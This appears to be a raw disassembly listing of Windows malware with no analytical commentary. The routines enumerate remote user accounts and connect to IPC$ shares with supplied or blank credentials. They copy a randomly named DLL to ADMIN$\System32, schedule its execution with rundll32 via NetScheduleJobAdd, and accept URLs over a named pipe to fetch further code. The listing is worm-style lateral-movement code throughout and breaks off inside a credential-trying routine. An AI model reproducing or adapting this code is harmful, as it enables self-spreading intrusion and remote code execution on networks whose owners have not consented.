Buffer = byte ptr -104h
nSize = dword ptr -4
Dest = dword ptr 8
Count = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 104h
lea eax, [ebp+nSize]
push eax ; nSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
mov [ebp+nSize], 100h
call GetComputerNameA
push 7
lea eax, [ebp+Buffer]
push eax
push offset byte_9A268C ; Format
push [ebp+Count] ; Count
push [ebp+Dest] ; Dest
call _snprintf
add esp, 14h
leave
retn
sub_9A8D3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8D7E(char *lpBuffer)
sub_9A8D7E proc near ; CODE XREF: sub_9A9067+65�p
Dest = byte ptr -10Ch
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpBuffer = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
lea eax, [ebp+Dest]
push 104h ; Count
push eax ; Dest
call sub_9A8D3E
pop ecx
pop ecx
push 0 ; hTemplateFile
push 80h ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 3 ; dwShareMode
push 0C0000000h ; dwDesiredAccess
lea eax, [ebp+Dest]
push eax ; lpFileName
call CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_9A8DC5
xor eax, eax
jmp short loc_9A8DFE
; ---------------------------------------------------------------------------
loc_9A8DC5: ; CODE XREF: sub_9A8D7E+41�j
push esi
push [ebp+lpBuffer] ; Str
call strlen
pop ecx
push 0 ; lpOverlapped
lea esi, [eax+1]
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push esi ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push ebx ; hFile
call WriteFile
test eax, eax
jz short loc_9A8DF3
cmp esi, [ebp+NumberOfBytesWritten]
jnz short loc_9A8DF3
mov [ebp+var_4], 1
loc_9A8DF3: ; CODE XREF: sub_9A8D7E+67�j
; sub_9A8D7E+6C�j
push ebx ; hObject
call CloseHandle
mov eax, [ebp+var_4]
pop esi
loc_9A8DFE: ; CODE XREF: sub_9A8D7E+45�j
pop ebx
leave
retn
sub_9A8D7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A8E01 proc near ; CODE XREF: sub_9A9067+26�p
Buf2 = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Dest = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
mov esi, eax
push esi ; Str
call wcslen
shl eax, 1
cmp eax, 1F6h
pop ecx
jnb short loc_9A8E22
xor eax, eax
jmp loc_9A8F0F
; ---------------------------------------------------------------------------
loc_9A8E22: ; CODE XREF: sub_9A8E01+18�j
push ebx
push 0Ch ; Size
lea ebx, [esi+66h]
push offset loc_9BA9F0 ; Buf2
push ebx ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jz short loc_9A8E41
xor eax, eax
jmp loc_9A8F0E
; ---------------------------------------------------------------------------
loc_9A8E41: ; CODE XREF: sub_9A8E01+37�j
push edi
mov esi, 190h
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
test edi, edi
jz loc_9A8F0D
push esi ; Size
push ebx ; Src
push edi ; Dst
call memcpy
add esp, 0Ch
push 15h
pop ecx
mov eax, ecx
loc_9A8E6A: ; CODE XREF: sub_9A8E01+70�j
xor byte ptr [eax+edi], 0C4h
inc eax
cmp eax, esi
jb short loc_9A8E6A
mov eax, dword_9A26A4
mov [ebp+Buf2], eax
mov eax, dword_9A26A8
or ebx, 0FFFFFFFFh
mov [ebp+var_8], eax
mov [ebp+var_4], ecx
loc_9A8E89: ; CODE XREF: sub_9A8E01+A6�j
push 7 ; Size
lea eax, [ebp+Buf2]
push eax ; Buf2
mov eax, [ebp+var_4]
add eax, edi
push eax ; Buf1
call memcmp
add esp, 0Ch
test eax, eax
jz short loc_9A8EAB
inc [ebp+var_4]
cmp [ebp+var_4], esi
jb short loc_9A8E89
jmp short loc_9A8EAE
; ---------------------------------------------------------------------------
loc_9A8EAB: ; CODE XREF: sub_9A8E01+9E�j
mov ebx, [ebp+var_4]
loc_9A8EAE: ; CODE XREF: sub_9A8E01+A8�j
and [ebp+var_4], 0
cmp ebx, 0FFFFFFFFh
jz short loc_9A8F03
sub esi, ebx
cmp esi, [ebp+arg_4]
jb short loc_9A8EC1
mov esi, [ebp+arg_4]
loc_9A8EC1: ; CODE XREF: sub_9A8E01+BB�j
push esi ; Count
add ebx, edi
push ebx ; Source
mov ebx, [ebp+Dest]
push ebx ; Dest
call strncpy
mov byte ptr [esi+ebx-1], 0
push 2Fh ; Val
add ebx, 7
push ebx ; Str
call strchr
mov esi, eax
add esp, 14h
test esi, esi
jz short loc_9A8EFC
inc esi
push esi ; Str
call strlen
inc eax
push eax ; int
push esi ; int
push esi ; Str
call sub_9AD2C5
add esp, 10h
loc_9A8EFC: ; CODE XREF: sub_9A8E01+E6�j
mov [ebp+var_4], 1
loc_9A8F03: ; CODE XREF: sub_9A8E01+B4�j
push edi ; hMem
call GlobalFree
mov eax, [ebp+var_4]
loc_9A8F0D: ; CODE XREF: sub_9A8E01+53�j
pop edi
loc_9A8F0E: ; CODE XREF: sub_9A8E01+3B�j
pop ebx
loc_9A8F0F: ; CODE XREF: sub_9A8E01+1C�j
pop esi
leave
retn
sub_9A8E01 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A8F12(u_long netlong,int)
sub_9A8F12 proc near ; DATA XREF: sub_9A8F28+12�o
netlong = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push dword ptr [eax+4] ; Size
push dword ptr [eax] ; Src
push [esp+8+netlong] ; netlong
call sub_9AABAE
add esp, 0Ch
retn
sub_9A8F12 endp
; =============== S U B R O U T I N E =======================================
; DWORD __stdcall sub_9A8F28(LPVOID)
sub_9A8F28 proc near ; DATA XREF: sub_9A8F60+47�o
hMem = dword ptr 4
push esi
push edi
push 927C0h ; dwMilliseconds
call Sleep
mov esi, [esp+8+hMem]
push esi
push offset sub_9A8F12
push offset CriticalSection
call sub_9A8D08
mov edi, GlobalFree
add esp, 0Ch
push dword ptr [esi] ; hMem
call edi ; GlobalFree
push esi ; hMem
call edi ; GlobalFree
pop edi
xor eax, eax
pop esi
retn 4
sub_9A8F28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A8F60(void *Src,SIZE_T Size)
sub_9A8F60 proc near ; CODE XREF: sub_9AD6D4+89�p
ThreadId = dword ptr -4
Src = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov edi, GlobalAlloc
push 8 ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
mov esi, eax
test esi, esi
jz short loc_9A8FC2
push ebx
mov ebx, [ebp+Size]
push ebx ; dwBytes
push 40h ; uFlags
call edi ; GlobalAlloc
xor edi, edi
cmp eax, edi
mov [esi], eax
jnz short loc_9A8F94
push esi ; hMem
call GlobalFree
xor eax, eax
jmp short loc_9A8FC1
; ---------------------------------------------------------------------------
loc_9A8F94: ; CODE XREF: sub_9A8F60+27�j
push ebx ; Size
push [ebp+Src] ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push edi ; dwCreationFlags
push esi ; lpParameter
push offset sub_9A8F28 ; lpStartAddress
push edi ; dwStackSize
push edi ; lpThreadAttributes
mov [esi+4], ebx
call CreateThread
push eax ; hObject
call CloseHandle
xor eax, eax
inc eax
loc_9A8FC1: ; CODE XREF: sub_9A8F60+32�j
pop ebx
loc_9A8FC2: ; CODE XREF: sub_9A8F60+16�j
pop edi
pop esi
leave
retn
sub_9A8F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9A8FC6(LPVOID)
sub_9A8FC6 proc near ; DATA XREF: sub_9A9015+35�o
var_4 = dword ptr -4
lpszUrl = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
push 0 ; int
lea eax, [ebp+var_4]
push eax ; int
push [ebp+lpszUrl] ; lpszUrl
call sub_9ACAC1
mov esi, GlobalFree
mov edi, eax
add esp, 0Ch
test edi, edi
jz short loc_9A9008
push 1 ; int
push [ebp+var_4] ; int
push edi ; int
push offset CriticalSection ; lpCriticalSection
call sub_9A8AD0
add esp, 10h
test eax, eax
jz short loc_9A9005
call sub_9AD569
loc_9A9005: ; CODE XREF: sub_9A8FC6+38�j
push edi ; hMem
call esi ; GlobalFree
loc_9A9008: ; CODE XREF: sub_9A8FC6+21�j
push [ebp+lpszUrl] ; hMem
call esi ; GlobalFree
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_9A8FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9015(char *Src)
sub_9A9015 proc near ; CODE XREF: sub_9A9067:loc_9A90D3�p
; sub_9A90F2+81�p
ThreadId = dword ptr -4
Src = dword ptr 8
push ebp
mov ebp, esp
push ecx
push esi
push edi
push [ebp+Src] ; Str
call strlen
mov esi, eax
pop ecx
inc esi
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov edi, eax
test edi, edi
jz short loc_9A9063
push esi ; Size
push [ebp+Src] ; Src
push edi ; Dst
call memcpy
add esp, 0Ch
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
push edi ; lpParameter
push offset sub_9A8FC6 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
xor eax, eax
inc eax
loc_9A9063: ; CODE XREF: sub_9A9015+1F�j
pop edi
pop esi
leave
retn
sub_9A9015 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9067 proc near ; CODE XREF: sub_9AAD64+1C�p
Src = byte ptr -124h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 114h
push offset stru_9A26B0
call __SEH_prolog
and [ebp+var_1C], 0
and [ebp+ms_exc.disabled], 0
push 104h
lea eax, [ebp+Src]
push eax
mov eax, [ebp+arg_0]
call sub_9A8E01
pop ecx
pop ecx
test eax, eax
jz short loc_9A90E5
lea eax, [ebp+Src]
push eax ; Str1
call sub_9AD312
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_9A90B9
push eax ; int
push offset CriticalSection ; lpCriticalSection
call sub_9A8C17
pop ecx
pop ecx
loc_9A90B9: ; CODE XREF: sub_9A9067+43�j
call GetVersion
cmp ax, 5
lea eax, [ebp+Src]
push eax ; Src
jnz short loc_9A90D3
call sub_9A8D7E
jmp short loc_9A90D8
; ---------------------------------------------------------------------------
loc_9A90D3: ; CODE XREF: sub_9A9067+63�j
call sub_9A9015
loc_9A90D8: ; CODE XREF: sub_9A9067+6A�j
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A90E5
; ---------------------------------------------------------------------------
loc_9A90DE: ; DATA XREF: .text:stru_9A26B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A90E2: ; DATA XREF: .text:stru_9A26B0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A90E5: ; CODE XREF: sub_9A9067+2F�j
; sub_9A9067+75�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A9067 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_9A90F2(LPVOID)
sub_9A90F2 proc near ; DATA XREF: StartAddress+64�o
var_511 = byte ptr -511h
Buffer = byte ptr -510h
Dest = byte ptr -110h
var_C = dword ptr -0Ch
NumberOfBytesRead= dword ptr -8
hObject = dword ptr -4
push ebp
mov ebp, esp
sub esp, 510h
push ebx
push esi
push edi
lea eax, [ebp+Dest]
push 104h ; Count
push eax ; Dest
call sub_9A8D3E
mov edi, CreateNamedPipeA
pop ecx
pop ecx
mov ebx, 3E8h
mov esi, 400h
jmp short loc_9A9182
; ---------------------------------------------------------------------------
loc_9A9123: ; CODE XREF: sub_9A90F2+AA�j
push 0 ; lpOverlapped
push [ebp+hObject] ; hNamedPipe
call ConnectNamedPipe
mov [ebp+var_C], eax
call GetLastError
cmp [ebp+var_C], 0
jnz short loc_9A9144
cmp eax, 217h
jnz short loc_9A91A3
loc_9A9144: ; CODE XREF: sub_9A90F2+49�j
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push esi ; nNumberOfBytesToRead
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push [ebp+hObject] ; hFile
call ReadFile
test eax, eax
jz short loc_9A9179
mov eax, [ebp+NumberOfBytesRead]
cmp [ebp+eax+var_511], 0
jnz short loc_9A9179
lea eax, [ebp+Buffer]
push eax ; Src
call sub_9A9015
pop ecx
loc_9A9179: ; CODE XREF: sub_9A90F2+6B�j
; sub_9A90F2+78�j
push [ebp+hObject] ; hObject
call CloseHandle
loc_9A9182: ; CODE XREF: sub_9A90F2+2F�j
push 0 ; lpSecurityAttributes
push ebx ; nDefaultTimeOut
push esi ; nInBufferSize
push esi ; nOutBufferSize
push 0Ah ; nMaxInstances
push 4 ; dwPipeMode
lea eax, [ebp+Dest]
push 3 ; dwOpenMode
push eax ; lpName
call edi ; CreateNamedPipeA
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jnz short loc_9A9123
xor eax, eax
inc eax
jmp short loc_9A91AE
; ---------------------------------------------------------------------------
loc_9A91A3: ; CODE XREF: sub_9A90F2+50�j
push [ebp+hObject] ; hObject
call CloseHandle
xor eax, eax
loc_9A91AE: ; CODE XREF: sub_9A90F2+AF�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_9A90F2 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A91B5(BYTE Data)
sub_9A91B5 proc near ; CODE XREF: sub_9AF7D5+3BA�p
Data = byte ptr 4
push esi
push edi
push dword ptr [esp+8+Data] ; Data
mov edi, offset word_9A26EE
push edi ; lpValueName
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi ; lpSubKey
push 80000001h ; hKey
call sub_9AD0F4
push dword ptr [esp+18h+Data] ; Data
push edi ; lpValueName
push esi ; lpSubKey
push 80000002h ; hKey
call sub_9AD0F4
add esp, 20h
pop edi
pop esi
retn
sub_9A91B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A91E7 proc near ; CODE XREF: StartAddress+84�p
var_8 = dword ptr -8
Data = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_8], 0
and dword ptr [ebp+Data], 0
push esi
push edi
lea eax, [ebp+Data]
push eax ; lpData
mov edi, offset word_9A26EE
push edi ; lpValueName
mov esi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi ; lpSubKey
push 80000001h ; int
call sub_9AD112
lea eax, [ebp+var_8]
push eax ; lpData
push edi ; lpValueName
push esi ; lpSubKey
push 80000002h ; int
call sub_9AD112
mov eax, [ebp+var_8]
add esp, 20h
cmp eax, dword ptr [ebp+Data]
pop edi
pop esi
ja short loc_9A9230
mov eax, dword ptr [ebp+Data]
loc_9A9230: ; CODE XREF: sub_9A91E7+44�j
mov ecx, [ebp+arg_0]
mov [ecx], eax
leave
retn
sub_9A91E7 endp
; =============== S U B R O U T I N E =======================================
sub_9A9237 proc near ; CODE XREF: sub_9A798D+83�p
; sub_9A9318+5C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push edi
or edi, 0FFFFFFFFh
test eax, eax
jz short loc_9A926B
mov edx, [esp+4+arg_0]
push ebx
push esi
loc_9A9249: ; CODE XREF: sub_9A9237+30�j
movzx ecx, byte ptr [edx]
push 8
inc edx
pop esi
loc_9A9250: ; CODE XREF: sub_9A9237+2D�j
mov ebx, ecx
xor ebx, edi
shr edi, 1
test bl, 1
jz short loc_9A9261
xor edi, 0EDB88320h
loc_9A9261: ; CODE XREF: sub_9A9237+22�j
shr ecx, 1
dec esi
jnz short loc_9A9250
dec eax
jnz short loc_9A9249
pop esi
pop ebx
loc_9A926B: ; CODE XREF: sub_9A9237+A�j
mov eax, edi
pop edi
retn
sub_9A9237 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A926F proc near ; CODE XREF: sub_9A96C2+28�p
Name = word ptr -208h
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 208h
push [ebp+arg_0]
lea eax, [ebp+Name]
push offset aSIpc ; "\\\\%s\\IPC$"
push 104h ; Count
push eax ; Dest
call _snwprintf
and [ebp+var_2], 0
add esp, 10h
push 1 ; fForce
push 0 ; dwFlags
lea eax, [ebp+Name]
push eax ; lpName
call WNetCancelConnection2W
xor eax, eax
leave
retn
sub_9A926F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A92AE(int,LPCWSTR lpUserName,LPCWSTR lpPassword)
sub_9A92AE proc near ; CODE XREF: sub_9A96C2+F�p
Dest = word ptr -228h
var_22 = word ptr -22h
Dst = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
lpUserName = dword ptr 0Ch
lpPassword = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 228h
push esi
push [ebp+arg_0]
lea eax, [ebp+Dest]
push offset aSIpc ; "\\\\%s\\IPC$"
push 104h ; Count
push eax ; Dest
xor esi, esi
call _snwprintf
push 20h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
mov [ebp+var_22], si
call memset
add esp, 1Ch
push esi ; dwFlags
push [ebp+lpUserName] ; lpUserName
lea eax, [ebp+Dest]
push [ebp+lpPassword] ; lpPassword
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push eax ; lpNetResource
mov [ebp+var_14], 3
mov [ebp+var_10], offset Str
call WNetAddConnection2W
test eax, eax
jnz short loc_9A9313
inc esi
loc_9A9313: ; CODE XREF: sub_9A92AE+62�j
mov eax, esi
pop esi
leave
retn
sub_9A92AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9318(LPCWSTR lpWideCharStr)
sub_9A9318 proc near ; CODE XREF: sub_9A96C2+1E�p
FindFileData = _WIN32_FIND_DATAW ptr -864h
FileName = word ptr -614h
var_40E = word ptr -40Eh
Servername = word ptr -40Ch
var_206 = word ptr -206h
var_204 = byte ptr -204h
var_186 = word ptr -186h
MultiByteStr = byte ptr -184h
var_183 = byte ptr -183h
var_80 = byte ptr -80h
var_6C = byte ptr -6Ch
Dest = word ptr -50h
Dst = dword ptr -34h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_28 = dword ptr -28h
Source = word ptr -24h
SystemTime = _SYSTEMTIME ptr -1Ch
JobId = dword ptr -0Ch
NumberOfBytesWritten= dword ptr -8
var_4 = dword ptr -4
lpWideCharStr = dword ptr 8
push ebp
mov ebp, esp
sub esp, 864h
mov al, byte ptr WindowName ; "recv"
push ebx
push esi
push edi
push 40h
pop ecx
mov [ebp+MultiByteStr], al
xor eax, eax
lea edi, [ebp+var_183]
rep stosd
xor ebx, ebx
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
stosw
stosb
mov esi, 104h
push esi ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
mov [ebp+var_4], ebx
push ebx ; dwFlags
push ebx ; CodePage
call WideCharToMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; Str
call strlen
push eax
lea eax, [ebp+MultiByteStr]
push eax
call sub_9A9237
xor eax, 45419005h
push eax ; Seed
call srand
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+Dest]
add edx, 5
push edx
push eax
call sub_9AC672
mov edi, wcscat
lea eax, [ebp+Dest]
push offset a_ ; "."
push eax ; Dest
call edi ; wcscat
lea eax, [ebp+Dest]
push eax ; Source
lea eax, [ebp+var_6C]
push eax ; Dest
call wcscpy
add esp, 28h
loc_9A93C0: ; CODE XREF: sub_9A9318+D3�j
call rand
push 3
cdq
pop ecx
idiv ecx
lea eax, [ebp+Source]
inc edx
push edx
push eax
call sub_9AC672
lea eax, [ebp+Source]
push offset Str2 ; "dll"
push eax ; Str1
call wcscmp
add esp, 10h
test eax, eax
jz short loc_9A93C0
call sub_9AC50B
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call edi ; wcscat
lea eax, [ebp+var_6C]
push offset Str2 ; "dll"
push eax ; Dest
call edi ; wcscat
mov edi, _snwprintf
lea eax, [ebp+Dest]
push eax
push [ebp+lpWideCharStr]
lea eax, [ebp+FileName]
push offset aSAdminSystem32 ; "\\\\%s\\ADMIN$\\System32\\%s"
push esi ; Count
push eax ; Dest
call edi ; _snwprintf
lea eax, [ebp+var_6C]
push eax
push [ebp+lpWideCharStr]
lea eax, [ebp+Servername]
push offset aSAdminSystem32 ; "\\\\%s\\ADMIN$\\System32\\%s"
push esi ; Count
push eax ; Dest
mov [ebp+var_40E], bx
call edi ; _snwprintf
add esp, 38h
lea eax, [ebp+FindFileData]
push eax ; lpFindFileData
lea eax, [ebp+Servername]
push eax ; lpFileName
mov [ebp+var_206], bx
call FindFirstFileW
cmp eax, 0FFFFFFFFh
jz short loc_9A947E
push eax ; hFindFile
call FindClose
cmp [ebp+FindFileData.nFileSizeLow], ebx
jz short loc_9A947E
loc_9A9472: ; CODE XREF: sub_9A9318+191�j
; sub_9A9318+19E�j
mov [ebp+var_4], 1
jmp loc_9A95E6
; ---------------------------------------------------------------------------
loc_9A947E: ; CODE XREF: sub_9A9318+149�j
; sub_9A9318+158�j
push ebx ; hTemplateFile
push 6 ; dwFlagsAndAttributes
push 1 ; dwCreationDisposition
push ebx ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call CreateFileW
cmp eax, 0FFFFFFFFh
mov [ebp+JobId], eax
jnz short loc_9A94B8
call GetLastError
cmp eax, 50h
jz short loc_9A9472
cmp eax, 0B7h
jnz loc_9A95E6
jmp short loc_9A9472
; ---------------------------------------------------------------------------
loc_9A94B8: ; CODE XREF: sub_9A9318+186�j
push ebx ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
mov [ebp+NumberOfBytesWritten], ebx
push lpBuffer ; lpBuffer
push eax ; hFile
call WriteFile
test eax, eax
jz short loc_9A94E9
mov eax, [ebp+NumberOfBytesWritten]
cmp eax, nNumberOfBytesToWrite
jnz short loc_9A94E9
mov [ebp+var_4], 1
loc_9A94E9: ; CODE XREF: sub_9A9318+1BD�j
; sub_9A9318+1C8�j
push [ebp+JobId] ; hObject
call CloseHandle
push ebx ; lpUsedDefaultChar
push ebx ; lpDefaultChar
push esi ; cbMultiByte
lea eax, [ebp+MultiByteStr]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
lea eax, [ebp+FileName]
push eax ; lpWideCharStr
push ebx ; dwFlags
push ebx ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A951E
lea eax, [ebp+MultiByteStr]
push eax ; lpFileName
call sub_9AC6A4
pop ecx
loc_9A951E: ; CODE XREF: sub_9A9318+1F7�j
cmp [ebp+var_4], ebx
jz loc_9A95D9
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_80]
add edx, 5
push edx
push eax
call sub_9AC672
lea eax, [ebp+var_80]
push eax
lea eax, [ebp+Dest]
push eax
push offset aRundll32_exeSS ; "rundll32.exe %s,%s"
lea eax, [ebp+var_204]
push 40h ; Count
push eax ; Dest
call edi ; _snwprintf
push [ebp+lpWideCharStr]
lea eax, [ebp+Servername]
push offset aS ; "\\\\%s"
push esi ; Count
push eax ; Dest
mov [ebp+var_186], bx
call edi ; _snwprintf
add esp, 2Ch
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
mov [ebp+var_206], bx
call GetLocalTime
inc [ebp+SystemTime.wHour]
cmp [ebp+SystemTime.wHour], 18h
jb short loc_9A9596
add [ebp+SystemTime.wHour], 0FFE8h
loc_9A9596: ; CODE XREF: sub_9A9318+276�j
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call memset
movzx eax, [ebp+SystemTime.wHour]
imul eax, 36EE80h
mov [ebp+Dst], eax
lea eax, [ebp+var_204]
mov [ebp+var_28], eax
add esp, 0Ch
lea eax, [ebp+JobId]
push eax ; JobId
lea eax, [ebp+Dst]
push eax ; Buffer
lea eax, [ebp+Servername]
push eax ; Servername
mov [ebp+var_2C], 7Fh
mov [ebp+var_2B], 11h
call NetScheduleJobAdd
jmp short loc_9A95E6
; ---------------------------------------------------------------------------
loc_9A95D9: ; CODE XREF: sub_9A9318+209�j
lea eax, [ebp+FileName]
push eax ; lpFileName
call DeleteFileW
loc_9A95E6: ; CODE XREF: sub_9A9318+161�j
; sub_9A9318+198�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_9A9318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A95EE(LPCWSTR servername)
sub_9A95EE proc near ; CODE XREF: sub_9A96FE+2B�p
; sub_9A96FE+3A�p
totalentries = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
resume_handle = dword ptr -10h
entriesread = dword ptr -0Ch
var_8 = dword ptr -8
Buffer = dword ptr -4
servername = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
xor ebx, ebx
push edi
xor esi, esi
mov [ebp+Buffer], ebx
mov [ebp+resume_handle], ebx
xor edi, edi
loc_9A9603: ; CODE XREF: sub_9A95EE+B9�j
lea eax, [ebp+resume_handle]
push eax ; resume_handle
lea eax, [ebp+totalentries]
push eax ; totalentries
lea eax, [ebp+entriesread]
push eax ; entriesread
push 0FFFFFFFFh ; prefmaxlen
lea eax, [ebp+Buffer]
push eax ; bufptr
push 0 ; filter
push 1 ; level
push [ebp+servername] ; servername
call NetUserEnum
test eax, eax
mov [ebp+var_18], eax
jz short loc_9A962F
cmp eax, 0EAh
jnz short loc_9A96AD
loc_9A962F: ; CODE XREF: sub_9A95EE+38�j
cmp [ebp+Buffer], 0
jz short loc_9A96A0
add edi, [ebp+entriesread]
lea eax, ds:4[edi*4]
push eax ; NewSize
push esi ; Memory
mov [ebp+var_14], edi
call realloc
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_9A9694
and [ebp+var_8], 0
cmp [ebp+entriesread], 0
jbe short loc_9A9690
xor edi, edi
loc_9A965E: ; CODE XREF: sub_9A95EE+9D�j
mov eax, [ebp+Buffer]
add eax, edi
cmp dword ptr [eax+0Ch], 0
jz short loc_9A967F
test dword ptr [eax+18h], 2
jnz short loc_9A967F
push dword ptr [eax] ; Str
call _wcsdup
mov [esi+ebx*4], eax
pop ecx
inc ebx
loc_9A967F: ; CODE XREF: sub_9A95EE+79�j
; sub_9A95EE+82�j
inc [ebp+var_8]
mov eax, [ebp+var_8]
add edi, 20h
cmp eax, [ebp+entriesread]
jb short loc_9A965E
mov edi, [ebp+var_14]
loc_9A9690: ; CODE XREF: sub_9A95EE+6C�j
and dword ptr [esi+ebx*4], 0
loc_9A9694: ; CODE XREF: sub_9A95EE+62�j
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
and [ebp+Buffer], 0
loc_9A96A0: ; CODE XREF: sub_9A95EE+45�j
cmp [ebp+var_18], 0EAh
jz loc_9A9603
loc_9A96AD: ; CODE XREF: sub_9A95EE+3F�j
cmp [ebp+Buffer], 0
jz short loc_9A96BB
push [ebp+Buffer] ; Buffer
call NetApiBufferFree
loc_9A96BB: ; CODE XREF: sub_9A95EE+C3�j
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
sub_9A95EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A96C2(int lpWideCharStr,LPCWSTR lpUserName,LPCWSTR lpPassword)
sub_9A96C2 proc near ; CODE XREF: sub_9A96FE+12�p
; sub_9A96FE+6D�p ...
lpWideCharStr = dword ptr 8
lpUserName = dword ptr 0Ch
lpPassword = dword ptr 10h
push ebp
mov ebp, esp
push esi
push [ebp+lpPassword] ; lpPassword
xor esi, esi
push [ebp+lpUserName] ; lpUserName
push [ebp+lpWideCharStr] ; int
call sub_9A92AE
add esp, 0Ch
test eax, eax
jz short loc_9A96F1
push [ebp+lpWideCharStr] ; lpWideCharStr
call sub_9A9318
push [ebp+lpWideCharStr]
mov esi, eax
call sub_9A926F
pop ecx
pop ecx
loc_9A96F1: ; CODE XREF: sub_9A96C2+19�j
push 3Ch ; dwMilliseconds
call Sleep
mov eax, esi
pop esi
pop ebp
retn
sub_9A96C2 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A96FE(LPCWSTR lpWideCharStr)
sub_9A96FE proc near ; CODE XREF: sub_9A9898+78�p
Memory = dword ptr -104h
Password = word ptr -100h
lpWideCharStr = dword ptr 4
sub esp, 104h
push ebx
push 0 ; lpPassword
push 0 ; lpUserName
